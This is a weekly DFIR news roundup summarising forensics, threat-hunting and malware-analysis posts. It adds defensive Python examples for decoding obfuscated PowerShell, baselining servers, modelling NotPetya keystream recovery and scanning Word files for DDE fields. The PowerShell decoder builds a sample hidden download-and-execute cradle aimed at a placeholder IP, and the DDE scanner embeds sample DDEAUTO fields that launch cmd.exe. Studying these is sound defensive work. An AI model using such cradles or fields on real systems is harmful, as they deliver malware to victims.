FORENSIC ANALYSIS
- Hideaki Ihara at the Port 139 blog creates a test file on an NTFS file system to see how the $LogFile is populated.
  $LogFile (1)
- Adam Harrison at 1234n6 continues his investigation into the Windows Subsystem for Linux. After a recent update, Adam was able to confirm that “an individual user can install multiple userlands/distributions side by side”. Installation via the Windows Store results in these distros being stored within the WindowsApps folder, with the associated file systems created within the user’s local AppData Packages directory. Interestingly, because the new WSL distributions are Windows Store apps, “prefetch is not created or updated (unlike when launching Bash installed via the Beta method).”
  Further Forensicating of Windows Subsystem for Linux
- Arsenal Consulting tweeted a comparison between the last write times of keys in the active SOFTWARE hive and in the Fast Boot SOFTWARE hive on Windows 8/8.1/10. The last write times for the same keys differed, with the Fast Boot hive’s being later.
  Check out @ArsenalArmed’s Tweet
- The BlackBag Training Team has taken a look at the iOS 11 Do Not Disturb While Driving feature. I like how they explain the feature as the user would use it before looking at the plists the device uses to store the data.
  iOS11- Do Not Disturb While Driving Analysis
- The guys at CCL Group have compiled some information about the HEVC/HEIF files on iOS 11 and various ways to access and convert the files for viewing.
  iOS 11: HEVC and HEIF (heic) files
- Jason Hale at Digital Forensics Stream has a post “focused on the new information concerning storage devices tracked in the amcache, specifically in the Root\InventoryDevicePnp key”. “The amcache doesn’t store the depth of USB device information found in the SYSTEM hive or other well-known locations, but it provides an additional data point that helps to corroborate and/or supplement data harvested from other areas.”
  Amcache and USB Device Tracking
- Dave at EasyMetaData has updated his FindUSBMSC script.
  Update to FindUSBMSC.py for #macos #USBMSC parsing #dfir
- Oleg Afonin at Elcomsoft compares iOS and Android security and how each affects physical data acquisition. Basically, over time the devices are getting more and more secure out of the box.
  iOS vs. Android: Physical Data Extraction and Data Protection Compared
- There were a couple of posts on the Forensic Focus blog this week
  - They shared a paper by Frank Block and Andreas Dewald on Linux memory analysis. This report is an extended version of their DFRWS paper.
    Linux Memory Forensics: Dissecting the User Space Process Heap
  - Scar shared an article she co-wrote with Oleg Skulkin on creating a forensic image of a drive using FTK Imager and dc3dd, and then mounting the image with Arsenal Image Mounter.
    Windows Drive Acquisition
- Russ McRee at HolisticInfoSec has started a two-part series based on his presentation titled “DFIR Redefined: Deeper Functionality for Investigators with R”. This shows how R can be applied to DFIR to “interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment”.
  toolsmith #128 – DFIR Redefined: Deeper Functionality for Investigators with R – Part 1
- There were a couple of papers shared on the SANS Information Security Reading Room this week
  - They shared a whitepaper by Matt Bromiley on “the power of network forensics and why it should be incorporated into all incident response investigations.”
    Enhance Your Investigations with Network Data
  - They also shared Gabriel Sanchez’s Gold certification paper illustrating MITM attacks on an ICS protocol using Wireshark.
    Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark
- Andrea Fortuna at ‘So Long, and Thanks for All the Fish’ has written a few posts this week
  - The first post provides some details on the amcache and shimcache on Windows systems.
    Amcache and Shimcache in forensic analysis
  - The second takes a look at a number of Windows registry keys.
    Windows registry in forensic analysis
  - The last looks at Windows event logs and provides some useful event IDs for forensics.
    Windows event logs in forensic analysis
- Over on my ThinkDFIR site, I wrote an article about one of the documents that I create to assist my analysis jobs. This is an examination report document that I write as a sort of stream of consciousness for me to digest at a later stage (i.e. before Court) and quickly get back up to speed with the job and my findings/thinking at the time of my examination.
  Documenting My Work
- Troy Schnack has started a new blog and for his inaugural post has written up the “Hide It Pro” Android app. This is an app that hides data for the user and has the ability to encrypt files. I’ve had a look at a few of these apps and this is one of the only ones I’ve seen that legitimately encrypts the files it says it will (I’ve seen other apps that say they do, but they just change the filename). If the app is deleted and you don’t have the passcode you’d have to pull the APK code, find the decryption algorithm, and write your own brute-forcer.
  Hide It Pro App Forensics – Android
THREAT HUNTING
- Mari DeGrazia at ‘Another Forensics Blog’ has started a short series on malicious PowerShell scripts. This post covers hunting for malicious PowerShell artefacts and decoding obfuscated scripts. Mari walks through a few examples where she locates obfuscated PowerShell artefacts and is then able to recover some useful IoCs.
  Finding and Decoding Malicious PowerShell Scripts
- Adam Orton at Countercept provides “a short analysis of the various layers and components of [WSF payloads, seen both on client networks and uploaded to open-source malware repositories, that are obfuscated using “MegaCrypter”] that need to be decoded”. Adam also provides a YARA rule and decoder script.
  Why Megacrypter is a ‘megafail’
- Digital Forensics Corp shared a couple of articles this week
  - They shared an article by Greg Cottingham at Microsoft “about an attack which used PowerShell to run malicious code and collect user credentials”
    How Azure Security Center unveils suspicious PowerShell attack
  - They also shared a post by Carlos Perez at Dark Operator on WMI event log tracking using Sysmon 6.1
    WMI log analysis
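Both Mari’s post and the Azure Security Center write-up above deal with PowerShell that arrives base64-encoded and wrapped in further layers. The script below is an added example (my code, not from either post) of the decoding step: it pulls the -EncodedCommand argument out of a process command line, decodes it (base64 of UTF-16LE text), follows nested FromBase64String/DeflateStream layers inward, and extracts URLs as IoCs. The command line it works on is constructed here for the example; the two-stage loader and the 203.0.113.10 URL are assumptions, not samples from the posts.

```python
import base64
import re
import zlib
from typing import List, Set

# Constructed sample input (not from either post): the command line you might
# pull from a 4688 or Sysmon process-creation event. The inner script and the
# 203.0.113.10 URL are assumptions for the example.
INNER_SCRIPT = (
    "$u='http://203.0.113.10/update.php';"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)


def build_sample_command_line() -> str:
    """Wrap INNER_SCRIPT the way a two-stage loader would: raw deflate + base64
    inside a decoder stub, then the stub base64(UTF-16LE)-encoded for -EncodedCommand."""
    raw_deflate = zlib.compress(INNER_SCRIPT.encode())[2:-4]  # drop zlib header and adler32
    stub = (
        "IEX (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream("
        "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('%s'))),"
        "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
    ) % base64.b64encode(raw_deflate).decode()
    encoded = base64.b64encode(stub.encode("utf-16le")).decode()
    return "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + encoded


# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -enc, ...).
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the script passed via -EncodedCommand (base64 of UTF-16LE text)."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16le")


def inflate_if_compressed(blob: bytes) -> bytes:
    """Undo DeflateStream (raw deflate) or GZipStream; pass other data through."""
    for wbits in (-15, 31):
        try:
            return zlib.decompress(blob, wbits)
        except zlib.error:
            continue
    return blob


def peel_layers(script: str, max_depth: int = 8) -> List[str]:
    """Follow FromBase64String('...') literals inward, decompressing and decoding
    each layer, until no further embedded payload is found."""
    layers = [script]
    for _ in range(max_depth):
        m = B64_LITERAL.search(layers[-1])
        if not m:
            break
        blob = inflate_if_compressed(base64.b64decode(m.group(1)))
        # UTF-16LE ASCII text has a NUL in every second byte; otherwise treat as UTF-8.
        encoding = "utf-16le" if blob[1:2] == b"\x00" else "utf-8"
        try:
            layers.append(blob.decode(encoding))
        except UnicodeDecodeError:
            break
    return layers


def extract_urls(layers: List[str]) -> Set[str]:
    """Collect URL IoCs from every decoded layer."""
    return {url for layer in layers for url in URL_RE.findall(layer)}


if __name__ == "__main__":
    cmd = build_sample_command_line()
    layers = peel_layers(decode_encoded_command(cmd))
    for depth, text in enumerate(layers):
        print(f"--- layer {depth} ---\n{text}")
    print("IoCs:", sorted(extract_urls(layers)))
```

Real loaders vary the stub (GZipStream, -join tricks, string reversal), so treat the layer walker as a starting point and add a branch for each trick you meet; the inner script is where the hosts and paths worth pivoting on live.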
- Giovanni Vigna at Lastline shares his thoughts on breach detection systems and threat hunting.
  From Trapping to Hunting: Intelligently Analyzing Anomalies to Detect Network Compromises
- Nina Smith and Ramnath Venugopalan at McAfee Labs share the findings from a recent study of “more than 700 IT and security professionals around the world to better understand how threat hunting is used in organizations and how they hope to enhance their threat hunting capabilities.” They also list six core logs that top-tier SOCs use to identify attacks.
  Tips for Effective Threat Hunting
- There were a couple of posts on the SANS Internet Storm Centre this week
  - Renato Marinho explains how Morphus Labs’ new tool, distinct, was used to automate the hunt for “a breach [that] may have occurred in one or more of ~500 web servers of a big company on a given date range, even though there was no evidence of leaked data or any other IOC to guide the investigation.”
    Baselining Servers to Detect Outliers, (Wed, Oct 18th)
  - Basil Alawi S.Taher shows how to use the yarascan Volatility plugin.
    Using Yara rules with Volatility, (Fri, Oct 20th)
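The ISC baselining post above hunts across a fleet of supposedly identical web servers by looking for files that only a handful of hosts have. The code below is an added example of that idea (my illustration, not the distinct tool): given a per-host inventory of paths and hashes, it flags (path, hash) pairs present on at most N hosts, tells apart files that exist nowhere else from files whose content differs from the rest of the fleet, and can restrict itself to files modified in the date range of interest. The inventories are constructed for the example; how distinct itself gathers and scores its data is not described on this page.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed inventories (not real data): host -> {path: (sha256, mtime)}.
# In practice this would come from a find + sha256sum sweep of each server.
Inventory = Dict[str, Dict[str, Tuple[str, str]]]

COMMON = {
    "/var/www/html/index.php": ("a1f0", "2017-06-01"),
    "/var/www/html/lib/db.php": ("b2e1", "2017-06-01"),
    "/var/www/html/img/logo.png": ("c3d2", "2017-06-01"),
}

INVENTORIES: Inventory = {
    "web01": dict(COMMON),
    "web02": dict(COMMON),
    # web03 has an extra file dropped during the suspect window
    "web03": {**COMMON, "/var/www/html/css/.cache.php": ("9f9f", "2017-10-12")},
    # web04 has a modified copy of a file every other host also has
    "web04": {**COMMON, "/var/www/html/lib/db.php": ("ffff", "2017-10-12")},
}

Outlier = Tuple[str, str, List[str], str]  # (path, sha256, hosts, "unique" | "modified")


def find_outliers(inventories: Inventory, max_hosts: int = 1,
                  window: Optional[Tuple[str, str]] = None) -> List[Outlier]:
    """Flag (path, hash) pairs present on at most `max_hosts` hosts.

    window: optional (start, end) ISO dates; only files modified inside it are
    candidates, so the hunt can focus on the date range of interest.
    """
    occurrences: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for host, files in inventories.items():
        for path, (digest, mtime) in files.items():
            if window and not (window[0] <= mtime <= window[1]):
                continue
            occurrences[(path, digest)].append(host)

    outliers: List[Outlier] = []
    for (path, digest), hosts in occurrences.items():
        if len(hosts) > max_hosts:
            continue
        # Does the same path exist, with other content, on the rest of the fleet?
        other_digests = {
            inventories[h][path][0]
            for h in inventories if h not in hosts and path in inventories[h]
        }
        kind = "modified" if other_digests else "unique"
        outliers.append((path, digest, sorted(hosts), kind))
    return sorted(outliers)


if __name__ == "__main__":
    for path, digest, hosts, kind in find_outliers(INVENTORIES, window=("2017-10-01", "2017-10-31")):
        print(f"{kind:8} {path} {digest} on {','.join(hosts)}")
```

The threshold matters: with max_hosts=1 only true singletons surface, while a larger value also catches a change rolled out to a small subset, at the cost of picking up legitimate staging differences, which is why the date window is worth applying first.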
- Pablo Delgado at Syspanda shares a script “that was created to check on the health for Logstash and Elasticsearch nodes”. “This is very helpful if you aren’t running x-pack, or if you aren’t using other 3rd party tool to check the health status of your ELK nodes.”
  Logstash Master Script for ELK
- US-CERT has released some details on a “multi-stage intrusion campaign by threat actors targeting low security and small networks to gain access and move laterally to networks of major, high value asset owners within the energy sector”
  Alert (TA17-293A) Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors
UPCOMING WEBINARS
- AccessData will be hosting a number of webinars based on some of their “most popular hits of the recent past”.
  By Popular Demand – Live Training Webinars!
- Brett Shavers hosted a webinar during the week, which apparently had audio issues; as a result, he’s going to keep doing them. The downside is that they are limited to 50 attendees, and “the sessions will not remain online past the dates presented as recordings. These are one-time training sessions not to be repeated.” Information about the next case study can be found here
  Drop the mic…please.
- Katana Forensics will be hosting a webinar on their new Lantern Triage product on Nov 1st at 1pm ET
  Please register for ‘Lantern Triage Webinar’
- Jessica Hyde at Magnet Forensics will be hosting a webinar on how IoT devices will impact forensics on November 13th @ 1:00PM EDT.
  Making IoT Relevant
- Magnet Forensics will be hosting two webinars on Atlas, the case management tool that they recently purchased. These webinars will take place Tuesday, November 7th @ 9:00AM EDT and Wednesday, November 8th @ 1:00PM EDT
  From Intake to Court: Using Case Management to Stay on Track
PRESENTATIONS/PODCASTS
- Kevin DeLong at Avairy Solutions interviewed Sean Morrissey from Katana Forensics. Sean covered the challenges in mobile forensics relating to the Apple Watch, their new triage product for mobile devices, as well as some of the updates to iOS 11 surrounding passcode/Touch ID unlocking.
  HTCIA 2017 – Sean Morrissey
- Kevin also interviewed Brian Carrier from Basis Technology about what’s happening with Autopsy/TSK/Cyber Triage.
  HTCIA 2017 – Brian Carrier
- Ben Hughes shared the slides from his DevSecCon workshop on “MacOS security, hardening and forensics 101”
  Check out @benjammingh’s Tweet
- A number of playlists relating to DEF CON 25 were updated during the week
- There was another Forensic Lunch this week, live from OSDFCon. Dave and Matthew hosted Brian Carrier, Mark McKinnon, Brian Moran, Jessica Hyde, and Brian Baskin. Brian C spoke about his presentation on the new Autopsy/Sleuth Kit features and things that they’re working on. Brian B briefly spoke about his work on the Flare-On challenge and his recommendation for people getting into the industry to do CTFs, write code, and write blog posts. Lastly, Brian M and Jessica spoke about their work on Amazon hardware and cloud acquisition, as well as a quick mention of our team for the DFRWS IoT Challenge!
  Forensic Lunch 10/17/17
- On this week’s Digital Forensics Survival Podcast, Michael interviewed a practitioner about why he chose to undertake a master’s degree in DFIR.
  DFSP # 087 – DFIR Degrees
- SANS shared a few presentations from the 2017 DFIR Summit and Threat Hunting Summit.
  - ShimCache and AmCache enterprise-wide hunting – SANS Threat Hunting Summit 2017
  - Scaling Forensics Isn’t Magic – SANS Digital Forensics & Incident Response Summit 2017
  - Processing PCI Track Data with CDPO – SANS Digital Forensics & Incident Response Summit 2017
  - So Many Ducks, So Little Time – SANS Threat Hunting Summit 2017
  - Forensic 4cast Awards – SANS Digital Forensics & Incident Response Summit 2017
  - “Chris Sistrunk of Mandiant shows tools and tips on the very new field of DFIR for PLC’s, RTU’s and other embedded devices.”
    Digital Forensics and Incident Response (DFIR) for ICS Embedded Devices
MALWARE
- Sergei Shevchenko, Hirman Muhammad bin Abu Bakar, and James Wong at BAE Systems analyse an attack perpetrated against the Taiwanese Far Eastern International Bank (FEIB) and the malware that was used.
  Taiwan Heist: Lazarus Tools and Ransomware
- Alexandre Borges at Blackstorm Security has released a whitepaper walking through the analysis of a typical banking trojan
  Overview about a typical banking trojan
- CERT Polska analyse the Tofsee malware.
  A deeper look at Tofsee modules
- Sebastian Eschweiler at CrowdStrike describes the approach used “to collect more keystream bytes, which eventually leads to decrypt the complete disk” of a system encrypted with NotPetya.
  Full Decryption of Systems Encrypted by Petya/NotPetya
- Arsh Arora guest posts on the ‘CyberCrime & Doing Time’ blog analysing the TrickBot malware and its new ability to send spam.
  TrickBot’s New Magic Trick: Sending Spam
- The Cylance Threat Guidance Team analysed “a surreptitious and sophisticated remote access trojan (RAT) that had been planted and operated by the suspected threat actor” and which shared many similarities with the “Hacker’s Door” backdoor.
  Threat Spotlight: Opening Hacker’s Door
- Bill Finlayson and Jared Day at Endgame “dive into the underlying code [of the DDEAUTO bug to] better understand what the application was capable of with DDE, and what limitations an attacker may encounter when attempting to leverage this issue.”
  The Bug or Feature Debate is Back Yet Again: DDEAUTO Root Cause Analysis
- Furoner examines a maldoc that abuses DDE.
  Macroless DOC malware that avoids detection with Yara rule
- John Ferrell at Huntress Labs walks through the analysis of a suspicious DLL
  Uncovering the Payload
- There were a couple of posts on the Malwarebytes Labs blog this week
  - Hasherezade analyses the Magniber ransomware
    Magniber ransomware: exclusively for South Koreans
  - Thomas Reed takes a look at the OSX.Proton malware that was distributed via a supply chain attack on the Elmedia Player app.
    Mac malware OSX.Proton strikes again
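The CrowdStrike NotPetya post above rests on a property of every stream cipher: ciphertext XOR known plaintext yields keystream, and if an implementation flaw makes the keystream repeat across sectors, keystream recovered from a few sectors with predictable content decrypts the others that share it. The block below is an added toy model of that reasoning (my code, not CrowdStrike’s, and not NotPetya’s Salsa20): a deliberately flawed sector cipher whose counter is truncated so every fourth sector shares keystream, a small disk image built here for the example, and the recovery steps. The actual flaw, cipher and known-plaintext sources the post relies on are not described on this page; the truncated-counter-modulo-4 model is an assumption made for illustration.

```python
import hashlib
from typing import Dict, List, Optional

SECTOR = 32          # toy sector size; the digest below supplies exactly this many bytes
REUSE_PERIOD = 4     # assumed flaw: counter truncated so sector i and i+4 share keystream


def flawed_keystream(key: bytes, sector: int) -> bytes:
    """Toy keystream (NOT Salsa20): hash of key||counter where the counter is
    truncated, the kind of bug that makes keystream repeat across sectors."""
    counter = (sector % REUSE_PERIOD).to_bytes(4, "little")
    return hashlib.sha256(key + counter).digest()[:SECTOR]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_disk(key: bytes, sectors: List[bytes]) -> List[bytes]:
    return [xor_bytes(s, flawed_keystream(key, i)) for i, s in enumerate(sectors)]


def recover_keystream(ciphertext: List[bytes], known: Dict[int, bytes]) -> Dict[int, bytes]:
    """Known plaintext sector i gives keystream_i = C_i XOR P_i. Store it under
    the class of sectors that share it (i mod REUSE_PERIOD), which is the
    analyst's model of the flaw."""
    return {i % REUSE_PERIOD: xor_bytes(ciphertext[i], p) for i, p in known.items()}


def decrypt_with_recovered(ciphertext: List[bytes], ks: Dict[int, bytes]) -> List[Optional[bytes]]:
    """Decrypt every sector whose keystream class was recovered; None otherwise."""
    return [xor_bytes(c, ks[i % REUSE_PERIOD]) if i % REUSE_PERIOD in ks else None
            for i, c in enumerate(ciphertext)]


# Constructed disk (not real data): 12 sectors, a few with predictable content.
ZERO = bytes(SECTOR)                                  # unused sectors are all zeros
MFT_HDR = b"FILE0".ljust(SECTOR, b"\x00")             # record header with known magic
SECRET = [f"secret sector {i:02d}".encode().ljust(SECTOR, b".") for i in range(12)]
PLAIN = list(SECRET)
PLAIN[0], PLAIN[5], PLAIN[2] = ZERO, ZERO, MFT_HDR
KNOWN = {0: ZERO, 5: ZERO, 2: MFT_HDR}                # what an analyst can safely assume
KEY = hashlib.sha256(b"victim key, never recovered").digest()
CIPHER = encrypt_disk(KEY, PLAIN)


def run_recovery() -> List[Optional[bytes]]:
    return decrypt_with_recovered(CIPHER, recover_keystream(CIPHER, KNOWN))


if __name__ == "__main__":
    out = run_recovery()
    print(f"recovered {sum(s is not None for s in out)}/{len(out)} sectors without the key")
    for i, s in enumerate(out):
        print(i, s if s is not None else "<keystream class unknown>")
```

Three known sectors cover three of the four keystream classes, so nine of the twelve sectors decrypt without the key; the remaining class needs one more sector of known plaintext, which is exactly the "collect more keystream bytes" step the post describes.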
- There were a number of posts on the SANS Internet Storm Centre this week
  - Didier Stevens compares “2 seemingly identical µTorrent executables, with valid digital signatures, but different cryptographic hashes”
    It’s in the signature., (Sun, Oct 15th)
  - Didier also shows how to examine an MSG file using oledump
    Peeking into .msg files, (Sun, Oct 15th)
  - Brad Duncan examines some malspam that is pushing Hancitor.
    Hancitor malspam uses DDE attack, (Tue, Oct 17th)
  - Brad also takes a look at some “malspam from the Necurs Botnet pushing Locky ransomware using Word documents as their attachments”.
    Necurs Botnet malspam pushes Locky using DDE attack, (Thu, Oct 19th)
  - Lastly, Brad examines some “HSBC-themed malspam using [ISO files as email attachments] to distribute Loki Bot”.
    HSBC-themed malspam uses ISO attachments to push Loki Bot malware, (Thu, Oct 19th)
- There were a couple of posts on Securelist this week
  - Konstantin Zykov provides some information about the CutletMaker ATM malware.
    ATM malware is being sold on Darknet market
  - The GReAT team analyse an attack that has been tied to the BlackOasis APT.
    BlackOasis APT and new targeted attacks leveraging zero-day exploit
- Dr. Fahim Abbasi, Nicholas Ramos, Rodel Mendrez and Gerald Carsula at Trustwave SpiderLabs examine an attack where malicious actors are “spamming out similar Microsoft Sharepoint URLs [to their previous blog post] that link to fake Australian power and telco bills infected with malware.”
  Fake Power and Broadband Utility Bills serve Banking Trojans to Aussies
- Muhammad Umair, Zain Gardezi and Shahzad Ahmad at FireEye examine the Magniber malware that the Magnitude EK is distributing.
  Magniber Ransomware Wants to Infect Only the Right People
- There were a couple of posts on the TrendLabs blog this week
  - Joseph C Chen examines the Magniber ransomware distributed by the Magnitude EK
    Magnitude Exploit Kit Now Targeting South Korea With Magniber Ransomware
  - John Anthony Bañes takes a look at a few tricks that maldoc authors use.
    New Malicious Macro Evasion Tactics Exposed in URSNIF Spam Mail
- Felix Seele at VMRay examines a ransomware sample that uses DDE in a Word document.
  DDE Ransomware in a Macro-less Word Document
- The guys at We Live Security have examined the OSX/Proton backdoor, which has been delivered via a supply chain attack.
  OSX/Proton spreading again through supply-chain attack
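Several of the posts in this section (Endgame’s DDEAUTO root cause analysis, Furoner’s maldoc, Brad’s Hancitor and Locky malspam, and the VMRay ransomware sample) involve Word documents that carry a DDE or DDEAUTO field instead of a macro. The code below is an added example (mine, not from any of those posts) of how to triage a .docx for such fields: it opens the OOXML zip, reads every part under word/, and reassembles field codes both from w:fldSimple attributes and from complex fields whose w:instrText is split across several runs, which is how authors pad and split the instruction to slip past a naive string match. The document it scans is built in memory for the example; the cmd.exe/calc.exe instruction is a constructed sample, not a payload from any of the campaigns.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import List

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# Field instruction beginning with DDE or DDEAUTO, possibly quoted or padded.
DDE_RE = re.compile(r'^\s*"?\s*DDE(?:AUTO)?\b', re.IGNORECASE)


def field_codes(part_xml: bytes) -> List[str]:
    """Return every field instruction in a WordprocessingML part, whitespace
    normalised. Simple fields carry it in w:fldSimple/@w:instr; complex fields
    spread it over w:instrText runs between fldChar begin and separate/end."""
    root = ET.fromstring(part_xml)
    codes: List[str] = []
    current: List[str] = []
    in_field = False
    for el in root.iter():
        if el.tag == W + "fldSimple":
            codes.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                current, in_field = [], True
            elif kind in ("separate", "end") and in_field:
                codes.append("".join(current))
                in_field = False
        elif el.tag == W + "instrText":
            if in_field:
                current.append(el.text or "")
            else:  # stray instrText outside a field: still worth a look
                codes.append(el.text or "")
    return [" ".join(code.split()) for code in codes if code.strip()]


def find_dde_fields(docx_bytes: bytes) -> List[str]:
    """Scan document, headers, footers, footnotes and so on for DDE/DDEAUTO fields."""
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml") and name.count("/") == 1):
                continue
            try:
                codes = field_codes(z.read(name))
            except ET.ParseError:
                continue
            hits.extend(f"{name}: {code}" for code in codes if DDE_RE.search(code))
    return hits


def build_sample_docx() -> bytes:
    """Constructed .docx (not a real sample): one complex DDEAUTO field split
    across runs, one simple DDE field, and one benign PAGE field."""
    body = (
        "<w:p><w:r><w:t>Invoice attached.</w:t></w:r></w:p>"
        "<w:p>"
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DD</w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">EAUTO   c:\\\\Windows\\\\System32\\\\cmd.exe'
        ' "/k calc.exe" </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        "<w:r><w:t>Click to update</w:t></w:r>"
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        "</w:p>"
        '<w:p><w:fldSimple w:instr=" DDE &quot;c:\\\\cmd.exe&quot; &quot;/c whoami&quot; ">'
        "<w:r><w:t>x</w:t></w:r></w:fldSimple></w:p>"
        '<w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        f"<w:body>{body}</w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_dde_fields(build_sample_docx()):
        print(hit)
```

Reassembling the instruction before matching is the point: a rule that looks for the literal string DDEAUTO in document.xml misses a field whose instruction is split as " DD" + "EAUTO". Legacy .doc files store field codes differently and need oledump/olevba or a similar parser rather than this zip-and-XML approach.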
MISCELLANEOUS
- Carrie Roberts has a guest post on the Black Hills Information Security blog about output encoding. By default Windows PowerShell writes redirected output to files as UTF-16 (little-endian), which can cause unexpected grep results; it’s therefore suggested to convert the UTF-16 output to UTF-8 using “iconv”.
  Grepping Through PowerView Output
- The BlackBag Training Team provide a brief overview of LACE, Project VIC, and C4All.
  Fighting Back. Data Model Exports From Blacklight – LACE, Project VIC, and C4All
- Extreme Coders provide a writeup of the Flare-On 2017 challenge
  Flare-On Challenge 2017 Writeup
- Samuel Alonso at Cyber IR has provided a review of Scott J Roberts and Rebekah Brown’s “Intelligence-Driven Incident Response” and describes it as “the best book available today in the subject.”
  Intelligence-Driven Incident Response, book review.
- Apparently, the current X-Ways & Forensic Explorer Betas open AFF4 images natively now, although I haven’t seen anything online about this outside of this tweet. Either way, exciting news.
  Check out @wirespeed4n6’s Tweet
- There were a couple of posts of interest on Forensic Focus this week
  - They shared a round-up of forum posts that have inspired discussion
    Forensic Focus Forum Round-Up
  - They also shared a few news articles they found interesting over the last month
    Digital Forensics News October 2017
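Carrie’s post above is about a classic trap: Windows PowerShell saves redirected and Out-File output as UTF-16LE with a byte-order mark, so an ASCII pattern never matches the byte stream (every character is followed by a NUL) and grep either reports nothing or says the file is binary. The block below is an added example (mine, not from the post) that sniffs the encoding from the BOM, or from the NUL pattern when there is none, decodes before searching, and converts to UTF-8 the way the iconv step in the post does. The PowerView-style output is constructed for the example.

```python
import re
from typing import List

# Constructed sample (not from the post): a few lines of PowerView-style output,
# saved the way `Get-NetGroupMember ... > out.txt` does it in Windows
# PowerShell: UTF-16LE with a byte-order mark.
SAMPLE_TEXT = "\r\n".join([
    "MemberName     : CORP\\svc_backup",
    "GroupName      : Domain Admins",
    "MemberName     : CORP\\jdoe",
    "GroupName      : Helpdesk",
]) + "\r\n"
SAMPLE_UTF16 = b"\xff\xfe" + SAMPLE_TEXT.encode("utf-16-le")


def detect_encoding(raw: bytes) -> str:
    """Pick a codec: BOM first; without one, UTF-16LE ASCII text shows up as a
    NUL in every second byte."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return "utf-16"          # this codec consumes the BOM and picks the byte order
    if raw.startswith(b"\xef\xbb\xbf"):
        return "utf-8-sig"
    sample = raw[:4096]
    if len(sample) >= 2 and sample[1::2].count(0) > len(sample) // 4:
        return "utf-16-le"
    return "utf-8"


def grep_text(raw: bytes, pattern: str) -> List[str]:
    """grep that decodes first, so an ASCII pattern matches UTF-16 output."""
    regex = re.compile(pattern)
    return [line for line in raw.decode(detect_encoding(raw)).splitlines() if regex.search(line)]


def to_utf8(raw: bytes) -> bytes:
    """Whole-file equivalent of `iconv -f UTF-16LE -t UTF-8` (BOM dropped)."""
    return raw.decode(detect_encoding(raw)).encode("utf-8")


def naive_byte_grep(raw: bytes, pattern: str) -> bool:
    """What grep does on the raw bytes: search without decoding."""
    return re.search(pattern.encode(), raw) is not None


if __name__ == "__main__":
    print("raw grep finds 'Domain Admins':", naive_byte_grep(SAMPLE_UTF16, "Domain Admins"))
    print("decoded grep:", grep_text(SAMPLE_UTF16, "Domain Admins"))
    print("after conversion:", naive_byte_grep(to_utf8(SAMPLE_UTF16), "Domain Admins"))
```

The same NUL-interleaving explains why strings(1) run on PowerShell output or logs needs its wide-character mode (-e l) and why a YARA or Sigma string should be declared as wide when it targets UTF-16 text.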
- Adam at Hexacorn shows that it may be possible to execute a DLL using the handwriting section of the Windows on-screen keyboard.
  Beyond good ol’ Run key, Part 67
- Magnet Forensics have released their whitepaper on presenting digital evidence in Court.
  White Paper: 12 Tips for Presenting Digital Evidence in Court
- Mark McKinnon provides an update on the Autopsy plugin competition results. Of the 14 entries Mark submitted 12 (really stacking the deck in his favour, but hey, it works). He has also created an installer for all of his plugins to make them easier to obtain. Mark asks for feedback about where people would like to see his work on Autopsy modules head in the future.
  The Conclusion To The Road To OSDFCon
- SANS have shared the new DFIR course-specific challenge coins. I really need to put the work in to get one of those lethal forensicator coins…I think those are my favourite still.
  “Coin Check: Win the challenge, join the elite list of lethal forensicators & take home a brand new DFIR challenge coin!”
SOFTWARE UPDATES
- Didier Stevens has updated oledump to version 0.0.29, adding “support to decode strings like UNICODE strings (-t), and can dump strings (-S)”
  Update: oledump.py Version 0.0.29
- Didier also updated base64dump.py to version 0.0.8, adding “support to decode strings like UNICODE strings.”
  Update: base64dump.py Version 0.0.8
- Digital Detective updated NetAnalysis to v2.7 and HstEx to v4.7. “This version of NetAnalysis® introduces support for a number of new browsers as well as adding support for the latest release versions of existing browsers which are already supported.” “This release of HstEx® adds the ability to recover a number of new artefacts as well as adding support for three new browsers. We have also made a number of changes to support the updates released by the browsers already supported.”
  NetAnalysis® v2.7 and HstEx® v4.7 Released
